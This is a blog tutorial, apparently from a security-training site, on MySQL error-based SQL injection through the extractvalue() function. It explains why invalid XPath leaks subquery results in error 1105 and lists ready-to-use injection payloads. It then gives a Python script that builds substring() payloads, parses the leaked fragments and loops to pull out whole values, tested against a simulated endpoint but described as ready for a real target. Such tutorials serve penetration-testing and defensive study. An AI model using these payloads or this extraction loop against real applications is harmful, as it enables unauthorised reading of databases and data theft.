[sql injection-error injection 1] extractvalue() function error injection

Table of contents

extractvalue() error injection

1. Syntax introduction:

2. The reason for the error

network security coterie


(Note: pay attention to the MySQL version requirement below.)

extractvalue() error injection

1. Syntax introduction:

Version:

MySQL >= 5.1.5 (EXTRACTVALUE() and UPDATEXML() were added in 5.1.5; on older servers the function does not exist and the payloads below only produce an "unknown function" error).


Syntax:

EXTRACTVALUE(xml_expression, xpath_expression)

xml_expression is a string containing an XML fragment (MySQL has no XML column type; a TEXT/VARCHAR column or a literal is used), and xpath_expression is an XPath expression that selects the node(s) to extract.


Principle:

  1. The function first parses xml_expression into an XML document.
  2. It then parses xpath_expression and evaluates it against that document to locate the node(s) to extract. If the XPath expression is not syntactically valid, the statement fails with an error at this step.
  3. Finally, it returns the text content of the matched node(s) as a string (several matches are joined with spaces); an empty string is returned when nothing matches.


Usage:

Suppose a column xml_data (stored as text) holds the following XML:

<book>
  <title>Harry Potter</title>
  <author>J.K. Rowling</author>
  <year>2001</year>
</book>

The node values can be extracted with extractvalue() as follows:

SELECT EXTRACTVALUE(xml_data, '/book/title') AS title,
       EXTRACTVALUE(xml_data, '/book/author') AS author,
       EXTRACTVALUE(xml_data, '/book/year') AS year
FROM books;

This statement extracts the values of the "title", "author" and "year" nodes from the xml_data column and returns them as a result set.



2. The reason for the error

Cause:

MySQL validates xpath_expression before evaluating it. If the expression is not syntactically valid XPath, the server aborts the statement with error 1105 and echoes the offending expression in the error text:

ERROR 1105 (HY000): XPATH syntax error: '~abc'

That echo is the leak. When part of xpath_expression is built from a subquery, the subquery's result ends up inside the error message. Nothing else in the statement has to be wrong: extractvalue() is evaluated like any other expression, so it can be appended to an existing WHERE clause with "and", and an application that displays the database error verbatim hands the data back to the attacker. The XPath expression is never executed as SQL; this technique reads data through the error message and cannot, by itself, run statements such as DROP TABLE.


Example:

SELECT * FROM books WHERE id = 1 AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT DATABASE())));

CONCAT(0x7e, ...) prepends '~', which is not valid at the start of an XPath expression, so the server rejects the expression and reports it (with an assumed database name app_db):

ERROR 1105 (HY000): XPATH syntax error: '~app_db'

Three details matter in practice:

  1. The prefix must make the XPath invalid. '~' (0x7e) or a backslash (0x5c) work; a forward slash does not, because '/name' is valid XPath and simply returns an empty string without raising an error.
  2. The error message reproduces only the first 32 characters of the expression, so one query leaks the marker plus 31 characters of data. Longer values are read in pieces with SUBSTRING() (or MID()), advancing the offset each time.
  3. If the subquery returns NULL, CONCAT() returns NULL and EXTRACTVALUE() returns NULL without any error, so the absence of an error means "no data", not "not vulnerable".


Payload:

and (extractvalue(1,concat('~',(select database()))));

and (extractvalue('anything',concat(0x5c,(select database()))));

and (extractvalue('anything',concat('~',substring((select database()),1,5))));

and extractvalue(1,concat(0x7e,(select database()),0x7e))#

The first argument does not matter (1 or any string); only the second has to be invalid XPath. The second payload uses 0x5c (a backslash) as the marker instead of '~'. The third reads a fixed window with substring() and is the form used to walk through values longer than 31 characters. The last one comments out the rest of the original query with # and wraps the data in '~' on both sides, so the end of the leaked value is visible even when it is shorter than the window.
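The following is an added example, not code from the original post: a self-contained Python simulation of the extraction loop behind the payloads above. It builds the substring() payload for a given offset, parses the leaked fragment out of a MySQL error 1105 message, and walks past the 32-character limit of the XPath error text. Because it must run offline, a constructed stand-in for the vulnerable endpoint replaces a real MySQL server; the database names and subquery results in FAKE_DB are made up.

```python
# Added example (not code from the original post): a self-contained simulation of
# extractvalue() error-based extraction. It shows the payload shape the post lists,
# how to parse the leaked fragment out of MySQL error 1105, and how SUBSTRING()
# offsets walk past the 32-character limit of the XPath error message.
import re
from typing import Callable, Dict, Optional

# MySQL echoes at most 32 characters of the offending XPath expression. The
# marker takes one of them, leaving 31 characters of leaked data per query.
ERROR_WINDOW = 32
MARKER = "~"                     # 0x7e: not valid at the start of an XPath expression
CHUNK = ERROR_WINDOW - len(MARKER)


def build_payload(subquery: str, offset: int, length: int = CHUNK) -> str:
    """Fragment appended to a numeric WHERE clause; leaks `length` characters of the
    subquery result starting at 1-based `offset` through an invalid XPath expression."""
    return (f"and extractvalue(1,concat(0x7e,"
            f"substring(({subquery}),{offset},{length})))#")


def parse_leak(error_message: str) -> Optional[str]:
    """Return the data echoed in "XPATH syntax error: '~...'", or None if the
    response is not that error (wrong marker, syntax error elsewhere, no error)."""
    m = re.search(r"XPATH syntax error: '(.*)'\s*$", error_message, re.S)
    if not m or not m.group(1).startswith(MARKER):
        return None
    return m.group(1)[len(MARKER):]


def extract_all(run_query: Callable[[str], str], subquery: str) -> str:
    """Read the whole subquery result CHUNK characters at a time, stopping when a
    window comes back short or empty (end of data, or no error was raised)."""
    pieces = []
    offset = 1
    while True:
        leaked = parse_leak(run_query(build_payload(subquery, offset)))
        if not leaked:
            break
        pieces.append(leaked)
        if len(leaked) < CHUNK:
            break
        offset += CHUNK
    return "".join(pieces)


# --- constructed stand-in for a vulnerable endpoint backed by MySQL -----------
# Assumed subquery results; these names are made up for the example.
FAKE_DB: Dict[str, str] = {
    "select database()": "app_db",
    "select group_concat(schema_name) from information_schema.schemata":
        "information_schema,mysql,performance_schema,sys,app_db",
}


def fake_vulnerable_endpoint(injected: str) -> str:
    """Mimic MySQL's reaction to the payload: evaluate substring() over the assumed
    subquery result, prepend the marker, truncate to 32 chars, raise error 1105.
    (A real server returns NULL with no error if the subquery yielded NULL.)"""
    m = re.search(r"substring\(\((.+?)\),(\d+),(\d+)\)", injected)
    if not m or m.group(1) not in FAKE_DB:
        return "ERROR 1064 (42000): You have an error in your SQL syntax"
    value = FAKE_DB[m.group(1)]
    start, length = int(m.group(2)), int(m.group(3))
    fragment = value[start - 1:start - 1 + length]
    echoed = (MARKER + fragment)[:ERROR_WINDOW]
    return f"ERROR 1105 (HY000): XPATH syntax error: '{echoed}'"


if __name__ == "__main__":
    q = "select group_concat(schema_name) from information_schema.schemata"
    print(build_payload(q, 1))
    print(extract_all(fake_vulnerable_endpoint, q))
```

Against a real target, run_query would send the payload in the injectable parameter and return the page or API body; parse_leak only needs the error text to survive into that response. The stop condition (a window shorter than 31 characters) is what makes the loop terminate without knowing the value's length in advance.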



network security coterie

Book Bansheng / Network Security Knowledge System - Practice Center (Gitee): https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledge: https://github.com/BLACKxZONE/Treasure_knowledge


Origin blog.csdn.net/qq_53079406/article/details/131633092